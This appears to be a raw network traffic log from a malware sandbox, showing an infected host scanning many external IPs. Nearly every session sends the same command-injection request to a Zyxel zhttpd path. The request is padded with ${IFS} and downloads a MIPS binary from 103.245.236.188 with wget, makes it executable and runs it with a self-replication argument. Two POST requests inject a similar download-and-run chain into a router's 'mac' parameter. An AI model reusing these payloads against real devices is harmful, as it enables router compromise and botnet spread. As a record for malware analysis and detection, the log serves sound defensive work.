                                                Jan 12, 2024 18:16:42.921123028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9470192.168.2.2335818177.239.190.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921154976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9471192.168.2.2352778212.214.241.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921211004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9472192.168.2.23605905.46.201.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921250105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9473192.168.2.233580699.86.35.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921283007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9474192.168.2.2335480116.51.143.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921329021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9475192.168.2.235127096.134.26.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921348095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9476192.168.2.23571069.134.77.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921391964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9477192.168.2.234624671.169.144.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921463966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9478192.168.2.234177851.251.135.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921463966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9479192.168.2.2357942184.158.36.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921480894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9480192.168.2.234973068.167.17.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921536922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9481192.168.2.2339602112.49.184.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921562910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9482192.168.2.235643471.85.7.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921597958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9483192.168.2.233878478.254.219.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921644926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9484192.168.2.2352758126.255.183.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921665907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9485192.168.2.235368295.128.104.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921700001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9486192.168.2.2351914194.73.239.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921753883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9487192.168.2.2349246191.172.116.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921770096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9488192.168.2.233539261.92.211.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921794891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9489192.168.2.235956847.111.59.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921848059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9490192.168.2.2349442221.34.235.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921957970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9491192.168.2.2348196161.95.230.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921957970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9492192.168.2.2352618104.185.195.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921983004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9493192.168.2.2349618196.140.211.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922008038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9494192.168.2.2336360137.38.199.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922070980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9495192.168.2.233806452.49.223.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922116041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9496192.168.2.2348340113.139.183.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922137022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9497192.168.2.2341348131.232.177.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922179937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9498192.168.2.234297425.114.68.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922228098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9499192.168.2.2344770184.6.134.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922269106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9500192.168.2.2356458196.37.85.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922297955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9501192.168.2.233831865.240.126.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922334909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9502192.168.2.2339790138.254.1.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922375917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9503192.168.2.2336924211.221.194.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922390938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9504192.168.2.235461068.241.17.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.922439098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9505192.168.2.233623434.49.148.1808080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.150640965 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9506192.168.2.234140075.149.248.1138080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.185655117 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:16:43.329991102 CET411INHTTP/1.1 404 Not Found
                                                Date: Fri, 12 Jan 2024 12:16:33 GMT
                                                Server: Webs
                                                X-Frame-Options: SAMEORIGIN
                                                Cache-Control: no-cache
                                                Content-Length: 166
                                                Content-Type: text/html
                                                Connection: keep-alive
                                                Keep-Alive: timeout=60, max=99
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9507192.168.2.234096073.120.160.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933296919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9508192.168.2.233580618.217.174.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933346987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9509192.168.2.2344900164.26.10.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933408022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9510192.168.2.2344622211.82.6.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933424950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9511192.168.2.2357950169.199.211.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933464050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9512192.168.2.2333912180.96.217.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933499098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9513192.168.2.2347888159.147.195.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933549881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9514192.168.2.2335358198.69.81.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933587074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9515192.168.2.235057031.24.133.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933629990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9516192.168.2.2349882178.87.108.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933680058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9517192.168.2.23465349.243.204.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933722973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9518192.168.2.235688477.67.37.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933764935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9519192.168.2.235544212.220.135.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933804035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9520192.168.2.233740075.168.170.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933845043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9521192.168.2.2359554115.6.193.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933903933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9522192.168.2.236001071.41.33.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933926105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9523192.168.2.2356286201.163.111.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.933975935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9524192.168.2.234182074.95.122.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934006929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9525192.168.2.2335572132.111.105.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934041977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9526192.168.2.2353984191.209.92.167443
                                                TimestampBytes transferredDirectionData
